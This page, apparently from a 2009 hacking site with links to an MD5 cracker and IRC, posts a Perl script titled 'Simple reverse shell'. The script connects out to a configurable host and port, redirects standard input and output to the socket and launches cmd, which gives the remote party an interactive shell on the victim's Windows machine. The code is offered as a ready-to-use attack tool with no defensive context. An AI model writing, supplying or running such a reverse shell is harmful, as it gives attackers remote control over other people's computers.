#Home
|
#Search
|
#IRC(
WEB
/
Client
)
|
#MD5 Cracker
|
#Categories
|
#Links
|
#About
Simple reverse shell
#!/usr/bin/perl # Simple reverse shell by TheLeader # ^Greet$: hacking.org.il, nullbyte.org.il # 21/09/2009 use Socket; no warnings 'all'; $|++; $host = 'localhost'; # Remote host $port = 2222; # Remote port socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); connect(SOCK, sockaddr_in($port, inet_aton($host))) or exit(0); open STDIN, "<&SOCK"; open STDOUT, ">&SOCK"; open STDERR, ">&SOCK"; system("cmd"); close SOCK;
Back
Send all submissions to nullbyte.israel[at]gmail.com
Copyright © 2009 - 2010 | Queries: 4